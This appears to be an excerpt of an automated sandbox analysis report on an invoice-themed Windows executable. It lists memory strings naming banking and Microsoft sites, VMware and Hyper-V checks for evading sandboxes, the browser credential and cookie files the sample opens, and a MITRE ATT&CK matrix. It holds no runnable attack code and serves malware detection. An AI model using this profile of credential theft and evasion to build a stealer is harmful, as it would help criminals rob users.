          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003614B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rEqGLI7p5uhNqNCFVrNtQc12HMs0vzinLZc%2FKJbV1jTA%2FzrKnjitar9hXMUGl0dWCYEK0eFc78BMwZRFP1QEMulqXXlhJ%2Fl6vF3iXt5iDycStZ%2BXTjh2r3XVcsKbLpt1HAu7qxFV"}],"group":"cf-nel","max_age":604800}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696501413s
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696501413t
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696501413t
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005C0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWR
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696501413o
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696501413f
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe API call chain: ExitProcess graph end node graph_0-4662
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe API call chain: ExitProcess graph end node graph_0-4669
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405050
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess created: C:\Users\user\Desktop\FACTURAS_1_250075.exe "C:\Users\user\Desktop\FACTURAS_1_250075.exe"Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Users\user\Desktop\FACTURAS_1_250075.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1B
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match, File source: 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match, File source: Process Memory Space: FACTURAS_1_250075.exe PID: 2932, type: MEMORYSTR

Remote Access Functionality

Source: Yara match, File source: 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix (listed per tactic; the number in parentheses is the count the report shows for that technique, techniques without a number carry no count in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Access Token Manipulation (1); Process Injection (11); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (11); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (21); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (3); System Information Discovery (215); Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Web Service (1); Encrypted Channel (21); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement